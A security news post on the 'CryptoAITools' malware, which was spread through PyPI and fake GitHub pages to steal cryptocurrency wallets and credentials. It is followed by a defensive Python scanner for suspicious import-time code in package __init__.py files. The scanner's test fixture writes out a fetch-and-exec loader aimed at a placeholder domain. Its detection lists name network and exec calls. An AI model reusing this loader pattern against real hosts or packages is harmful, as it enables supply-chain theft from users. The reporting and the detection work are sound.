Man
Professional
Cybersecurity researchers have uncovered a new piece of malware called 'CryptoAITools' disguised as a cryptocurrency trading tool. The program is designed to steal data and drain users' cryptocurrency wallets. It was distributed through popular repositories such as the Python Package Index (PyPI) and fake GitHub pages, where it was downloaded more than 1,300 times before being completely removed.
Experts from Checkmarx reported that the malware is activated immediately after installation, targeting Windows and macOS operating systems. Users see a false GUI that distracts attention while the program steals data in the background. Malicious code hidden in the "__init__.py" file automatically detects the device's operating system and downloads the appropriate version of the program for further execution.
The program downloads additional malicious components from the fake "coinsw[.]app", which allegedly offers a cryptocurrency trading service. This approach allows hackers not only to hide their actions, but also to constantly update the program's functions by modifying the downloaded malicious files.
The key feature of the malware is a fake installation that masks the process of data theft. Malicious code actively collects confidential information, including data from cryptocurrency wallets (Bitcoin, Ethereum, etc.), saved passwords, cookies, browser history, data from cryptocurrency extensions, SSH keys, and files containing financial information. In the case of macOS devices, the program also collects notes from the Apple Notes and Stickies applications, and then sends all the information to the third-party service gofile[.]io and deletes the local copies.
Checkmarx also revealed that similar malware is being distributed via GitHub under the guise of a "Meme Token Hunter Bot" that purports to be powered by artificial intelligence and tracks meme tokens on the Solana blockchain. A Telegram channel is also supported, where the authors offer subscriptions and technical support to potential victims.
The multi-platform approach allows attackers to reach a wider audience, which poses serious risks to many cryptocurrency holders, expanding the scope of the attack and making it more difficult to detect.
Source
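The mechanism described above (an `__init__.py` that fingerprints the OS, downloads a platform-specific payload and runs it the moment the package is imported) is something a defender can triage statically across an installed environment. The script below is an added example for that purpose; it is not code from the post, from Checkmarx, or from the malware. It parses each `__init__.py` with Python's `ast` module, looks only at code that actually executes on import (module-level statements plus the bodies of locally defined functions those statements call), and reports network imports, network calls, OS probes and `exec`-style calls. The `SAMPLE_INIT` fixture is constructed for the demonstration and points at the reserved `example.invalid` domain, which never resolves.

```python
"""Static triage of installed Python packages for the import-time pattern
described above. Added example for defenders, not code from the post or
from Checkmarx. It only reads source files; it never executes them."""
import ast
import sys
from pathlib import Path

# Modules and calls that are unusual at import time of a trading library and,
# in combination, match the behaviour the write-up describes.
NETWORK_MODULES = {"urllib", "urllib.request", "requests", "http.client", "socket"}
NETWORK_CALL_PREFIXES = ("urllib.request.", "requests.", "socket.", "http.client.")
OS_PROBES = {"platform.system", "platform.machine", "sys.platform", "os.name"}
EXEC_CALLS = {"exec", "eval", "os.system", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_output"}


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_init_source(source: str) -> list[str]:
    """Return findings for the text of one __init__.py, in source order."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"unparseable source: {exc}"]

    local_funcs = {s.name: s for s in tree.body
                   if isinstance(s, (ast.FunctionDef, ast.AsyncFunctionDef))}
    followed: set[str] = set()

    def import_time_nodes(node: ast.AST):
        for sub in ast.walk(node):
            yield sub
            # A module-level call into a function defined in this file also
            # runs on import, so descend into that body (once per function).
            if (isinstance(sub, ast.Call) and isinstance(sub.func, ast.Name)
                    and sub.func.id in local_funcs and sub.func.id not in followed):
                followed.add(sub.func.id)
                for body_stmt in local_funcs[sub.func.id].body:
                    yield from import_time_nodes(body_stmt)

    findings: list[str] = []
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue  # a definition by itself executes nothing on import
        for node in import_time_nodes(stmt):
            if isinstance(node, ast.Import):
                names = [alias.name for alias in node.names]
            elif isinstance(node, ast.ImportFrom):
                names = [node.module or ""]
            else:
                names = []
            for name in names:
                if name in NETWORK_MODULES or name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"line {node.lineno}: imports network module '{name}'")
            if isinstance(node, ast.Call):
                callee = _dotted_name(node.func)
                if callee in EXEC_CALLS:
                    findings.append(f"line {node.lineno}: import-time call to {callee}()")
                elif callee.startswith(NETWORK_CALL_PREFIXES):
                    findings.append(f"line {node.lineno}: import-time network call {callee}()")
            elif isinstance(node, ast.Attribute) and _dotted_name(node) in OS_PROBES:
                findings.append(f"line {node.lineno}: OS fingerprinting via {_dotted_name(node)}")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every __init__.py under root (for example a site-packages directory)."""
    results = {}
    for init in sorted(root.rglob("__init__.py")):
        hits = scan_init_source(init.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(init)] = hits
    return results


# Constructed fixture mirroring the described pattern. "example.invalid" is a
# reserved, non-resolving domain, so this text can never reach a real host.
SAMPLE_INIT = '''\
import platform
import urllib.request
import subprocess

def _bootstrap():
    os_name = platform.system()
    url = "https://example.invalid/" + os_name + ".py"
    code = urllib.request.urlopen(url).read()
    exec(code)

_bootstrap()
'''

if __name__ == "__main__":
    # Usage: python scan_init.py /path/to/site-packages   (no argument: scan the fixture)
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    report = scan_tree(target) if target else {"<constructed sample>": scan_init_source(SAMPLE_INIT)}
    for path, hits in report.items():
        print(path)
        for hit in hits:
            print("   ", hit)
```

Run against the fixture it reports four findings (the network import, the `platform.system` probe, the `urlopen` call and the `exec`), while a normal package `__init__.py` that only re-exports submodules produces none. Any single finding is not proof of malice; the combination of OS probing, a network fetch and execution on import, in a package you did not expect to do any of that, is what merits pulling the package and its PyPI or GitHub history for a closer look.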